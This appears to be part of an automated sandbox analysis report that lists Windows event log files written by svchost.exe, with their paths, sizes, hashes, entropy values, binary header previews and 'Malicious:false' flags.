                                                                                                                                                                                SHA-512:6B14374B4E536E7887BCA637F242F45CA61C2D3EFFFFA3965B019E9EE920663DFC531092836B5BE59649B6026B97F7ED9AFF29947A5C4F04380F1D1FA8CAF362
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk..................................... ........7.3....................................................................t...............................................=...................................................................................q.......................................c...............<...........................j...................M...Y...........................j...............................F.......................................................................&...............**..h............./..$.........l.1&........l.1..LP;.{EE.d.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..V............{..P.r.o.v.i.d.e.r...3....=.......K...N.a.m.e.........N.E.T. .R.u.n.t.i.m.e..A..M...w........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n........

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.844757629881363
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:5he6UHi2uepX7xasnPC3FzFtpFDhFPFyF842xDmSyVflkWiVytr1jSmKbC93ZmLH:5VUHiapX7xadptrDT9W84R9RNdlJEt
                                                                                                                                                                                MD5:6DD9513F9459922C47E5DA7D177B65ED
                                                                                                                                                                                SHA1:22141C6315B5E37BF885AA1B2D611BB4A7B85186
                                                                                                                                                                                SHA-256:EEE9440984A354B116F442B7E64D4754847E667C0A90A6AD38DD990371A09086
                                                                                                                                                                                SHA-512:3D40609D277197F9249A917D3890960F419CB78B47A68CE5A74A902AC069DBAB781C33A104E21C8A12B5C484EACBB00783FE8F1AC48752C24709B833AAAE5F1C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........H...............H....................u3.......................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...............................................N...........&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppModel-Runtime%4Admin.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 3.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, show spot sensor, calibration: offset 0.000000, slope 13321401407157305344.000000
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.375898877258491
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:GhzN7UN0HN9NINoNaNxNUN7N+N8NXNINCXNGNXNNaYNXa4NvNhnNFNENNhSNEcNV:GDttjfckEwpQTB1cuat3x9
                                                                                                                                                                                MD5:C9340739814935979F6E070F71B429C3
                                                                                                                                                                                SHA1:5D5883156D59CE1BFCCE51E8B05190DACBD63C4D
                                                                                                                                                                                SHA-256:C73213B06AE8111F7F5E76AA12A63FBD173A2BF1072D07B0D1BEE6C91C722160
                                                                                                                                                                                SHA-512:23A7490C2F62515367EB614618910117A79AC4A42A0C9815C8194D47F4D8A978DB5A0D1F503BC6B07A2433DB05EB8F7582289AEDF7062C3D1B735049825CF459
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.x...............x.............................r.....................................................................].B.................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................{..........................&.......................MX......]...................................................................**......x.......G.".U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeployment%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):72488
                                                                                                                                                                                Entropy (8bit):4.2472609222321775
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:pV+VFhWV7V/uVxVBV+Vt/WWVnVyVqVmVXV5VX64VX7XjVXEVXVrVX9V6rV67UVjt:6EEIiXkrtrAVEU
                                                                                                                                                                                MD5:8DEF4D53626D1DDAAF19980B56956C89
                                                                                                                                                                                SHA1:FC50D33BEB342B7B2C67A64E5A55225753FA0D27
                                                                                                                                                                                SHA-256:B86DA8DDECB61D3BF53640F86FA3283B555A29E671EBC3CA0D0A2B0258A3E09D
                                                                                                                                                                                SHA-512:D09F17D4F37EC3C5A5F002F59E988D52F1B61116898AE62BBD548AD7E3DF6D36E5F9C6D3B590FA329B70909ECAE8BCA3074021EE369EC8C94E13BF191E445B43
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.I.......N.......I.......N...........@........Q........................................................................Ys................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**......M.......~b...$.........Z7;&...............................................................@.......X...a.!.....E..........@~b...$..g..TW....<.TW...........M....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....c.r....**......N............$.........Z

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.213049085236613
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:fh+m3shOg26Qm6mt3m+DmqkTmETiImombmtmgmRmvhmCmGImchm7mBmImwmtmHm2:fNCOg26Dk1TisCzjECrXqm
                                                                                                                                                                                MD5:C142C52B34FFDA11B1B98479A7FD083A
                                                                                                                                                                                SHA1:46E3403362EDEE1AA85FA9304DCCF2786938FBD6
                                                                                                                                                                                SHA-256:EE26845A028E718A3FCB180BB07B1B944DA0C876313A24EDA336A7BAF53D49C9
                                                                                                                                                                                SHA-512:1198A7AA1C55DD65542CBEA8A567A910645D6A167B02692C5C8E33F9AB40644BE233589181B7F67263324DEB1A661BE95E964607F1C680C7EFC8EDBED5E1E2C7
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk..0.......0.......0.......0...................:8O....................................................................Z...................P.......................x...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...............................)...................................................................**.......0......f6..W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.5176441861373292
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:fNVaO8sMa3Z85ZML7b2rjjc3Z85ZRp3Z85Zu3Z85Z23Z85Zu:lV7pp8nMLmvcp8nbp8nup8n2p8n
                                                                                                                                                                                MD5:0015474DBDBCC6BC2EC6B38A8CD00FDD
                                                                                                                                                                                SHA1:F33587C448FADDCACA28008D0A6587C2BAF093A4
                                                                                                                                                                                SHA-256:C3579E1999F1022AE58D3EC049252308309780FBC2526570A3578E9E1F034AE8
                                                                                                                                                                                SHA-512:31BECC029E157566D461BCAD183734ADD11A0B0595E47445179BE1DA0D2D4E62509FF4324DE08CEE2E0B6FDACD0FA7BA4B500F9A9E79665AD9A5AA70E262EB99
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........................................0....'.......................................................................a..............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.6213104887740535
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:0PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9hFUKjSxw:wXY5nVYIyyqED5BVZUe7NrVnL3K9fYS
                                                                                                                                                                                MD5:94CE283335713D796E068233C0D27233
                                                                                                                                                                                SHA1:8B154CE1AEB28021DFE8B3FE78D322210537769A
                                                                                                                                                                                SHA-256:619E945769B0AFB1D3097B0FD8D85539C20F3024E47A98CAAB23DCA2F089EE2E
                                                                                                                                                                                SHA-512:5DAFBD530019133D08737F49D10DFF926CAD9D665588F800D18B6F3321FFB1EF7C7C2D61F0AD30C1084ECD2086D90E7099A7A9E0AADD3DC8AA047B51D75879B6
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.....................................x...X....#.N........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y.......................**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-CodeIntegrity%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:modified
                                                                                                                                                                                Size (bytes):91736
                                                                                                                                                                                Entropy (8bit):2.508762603276442
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:ahdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorrqorrcoiorlorKoriob:aDCoLZGKP8DCoLZGKPFFNCMkS
                                                                                                                                                                                MD5:B18B8E51F9CC27E214AC45614D675F6F
                                                                                                                                                                                SHA1:9030961A5EB116912518533BE5E9F65FB3B24736
                                                                                                                                                                                SHA-256:3926F47FAADDB413A1EBBF40CFDB93243C308F6E2FBE8838D4C7390A81ED3C47
                                                                                                                                                                                SHA-512:C846C372FD64F5D5740BFD4AA44C93E1116684A905DFA252DADCF26BEA01270595209756BA40E6D02FD9D4CC0038164DD95ABA962510E69A487CCE0A5A36B4F8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......... ............... ............K.. N...{. ........................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................%5...................................0...............*..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-BindFlt%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:DIY-Thermocam raw data (Lepton 2.x), scale 8448-1024, spot sensor temperature 0.000000, unit celsius, color scheme 1, calibration: offset 0.000000, slope 206.521484
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.8818863793721268
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:PhAiPA5PNPxPEPHPhPEPmPSPRP3PoP5PUZPDPBPrPTP:P2N7
                                                                                                                                                                                MD5:ABC20FF1642044E1CCE03170FDE15383
                                                                                                                                                                                SHA1:8FA47598A436BFAC1C60AA663BBA85ED65684EB3
                                                                                                                                                                                SHA-256:335CB1E45B8A1EBDC3714F6744B8AA7332FD8A88C296A4FC03F300D1417CCE8D
                                                                                                                                                                                SHA-512:262570D8EAB15F9A890B7FFC26B6E6D6615B2659120D7595D2E14A2DB9394EF043B475F1B00239C9E59577821EEC69441C5964D8250CAA7C623FAF497735E839
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................&.. (...........................................................................c..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Containers-Wcifs%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.8732041818438444
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:ihZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+ly:iWXSYieD+tvgzmMvpgNNr/C
                                                                                                                                                                                MD5:B693B4CC631594D7178A17D644604830
                                                                                                                                                                                SHA1:010015CDCBAC9449FB75222B3ADAA84725A573E2
                                                                                                                                                                                SHA-256:2AB6A0ED88C441E535930D7653055EFB046C8E0D20409B95E70F6203B05B770E
                                                                                                                                                                                SHA-512:2625F3E08A6C17703CD43E2FE6FE6DC8B1096D4BCF3DE77DE75882E923AC278A0F24E21C43644A4909F21E2DF827CDF967C53ECA1D35D18BCAB453309C55546C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................&...'..... .......................................................................................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................&...................................................................................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.232683497746438
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:BhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh282:BbCyhLfI49L
                                                                                                                                                                                MD5:0038AC79F3B40741EAB0429F2E367B74
                                                                                                                                                                                SHA1:F02E75F1BF04FA6DEF6FD702DE4EF3B3BA916EC7
                                                                                                                                                                                SHA-256:41065F950378E660AA697888EDEE69448C17D57219E234117E499D05059E3D17
                                                                                                                                                                                SHA-512:5A1886EECF9A8131DB07002DAC67DD4DF4714285BC5D7753CFC75547C82C6A84CB1C8D285A822AE67AC4BC0AA282996E4FFBE3A3998EF9D8EF04306BC9259CFD
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........O...............O...........................................................................................>))................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................n..........n.......................................................................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.4979137394202926
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:+cMhFBuyKskZljdoKXjtT/r18rQXn8x3F4mLvgpaCm:HMhFBuV
                                                                                                                                                                                MD5:C7BC0B770A63C8940C69D47312E3A7BB
                                                                                                                                                                                SHA1:05A1BC797A71B529AA088096C32656E11C9A0F76
                                                                                                                                                                                SHA-256:431CBAA51709B20225245452E40537464558E323615F1704BD56BED6C106D0F9
                                                                                                                                                                                SHA-512:AF1B0950C659D991C2EBF57D99F6F2FB028D06F16CA125CBED1F14D15E20FF2BCDF77E6A6A00B66D5B891A70179AB182FDB2269BB4C5F472260059FBD7DB6C8C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........S...............S...............p...k{.@....................................................................0.%1................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.792827407520075
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:nVQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaYBnUm3iKLnn4eDB7:0Ht3iKLn
                                                                                                                                                                                MD5:152A48624B4DFD0D038B4FA3623BA7E7
                                                                                                                                                                                SHA1:5678AC8B8E8F29A58EA8D43EF57FFF9A6FDAEC28
                                                                                                                                                                                SHA-256:C4F9B02538E32C9F8583CACBBFA7C43453C03CEFEE70EC5DEB0194E96197BF49
                                                                                                                                                                                SHA-512:CB23A12137680CFD7B86FE67A4551D33CC727AE1F1EB5EB981D0DB7DB77F2F9A034AE08BEF109FFF080DC98467674369E675B06D768983E4BB15C819F3D4FE8E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........r...............r............... ............................................................................(.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):1.8858919329531718
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:Nh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDg:NMAP1Qa5AgfQQlke9a6
                                                                                                                                                                                MD5:B66301CC0555CC995B4374B6FF0F39E5
                                                                                                                                                                                SHA1:63D7895AAD4EA9BCDAF4D3BFB2911FBC3B316613
                                                                                                                                                                                SHA-256:C056C5B1E6C58773FC9A75C46E8CC74E855A1620D21D2FF3D0AA34CEA380165C
                                                                                                                                                                                SHA-512:5A40E2618146D20A0F89943A7155FF211302643CC0D70684CF86363E303D3887625366AF85D5B538C317E70DF3DE30193CE0CE5660FF52756CEF46AFFBBA11FB
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................]...`..*........................................................................c..................b...........................=...........................................................................................................................f...............?...........................m...................M...F................................................U..........&........................................&..............;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.428876543896683
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:vKhrEbExnEO4+EUEtEjEXE7LpEn7AEmxEsE27jE/iCESWQHEPEX5EwE2Ex7zEuEq:SfZRLvz75hyME8
                                                                                                                                                                                MD5:3E00DDA6A4D097354A6D64995B6F5637
                                                                                                                                                                                SHA1:37446C0346A6195D226249D251E7C8B5D9BA8EE9
                                                                                                                                                                                SHA-256:47B00BC6744A8886BE9ADAFE8E7C95FF08511038E35F12C66B74643326A29582
                                                                                                                                                                                SHA-512:1F2E1ABB9AFB705BA7E3C37B8A3DDB3EC180F83F2DBBD82C0AFA95EB37633057D9C5F4F0F76610CAC954FEACB1B7D6223B689A27628B3C69E1223CA216FB4AEC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.p...............p....................... .....U.....................................................................w.%e................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F...................................E....%......&............;...)...........-..e+.......'...1..................M...........m...........%>..M.......**......p.......Elr W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):3.462764563871168
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:5hYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Klc:51T4hImaVqA
                                                                                                                                                                                MD5:90C7B97351EB8C1E5D63C95F98DA7DC2
                                                                                                                                                                                SHA1:BCA659CC6F082891275AC1DE0DBCF11874239D97
                                                                                                                                                                                SHA-256:6E033AC321438132DD42CEF1729149128602226619B68BACC8509AA2C3BF7959
                                                                                                                                                                                SHA-512:E73206F70E009C1446EA7BA550901B9AF4F43CE0EBDA17DE514E3F55A65264490A24034BCEA90F88C9B0FE6FCED2CF9E970C85E969DB39C9374CF0A2F5AF8F9A
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.........s...............s...............P...............................................................................................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F................................................|..........&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                                                                                                                                                C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                                                                                                                                                Download File
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):2.543522413880544
                                                                                                                                                                                Encrypted:false
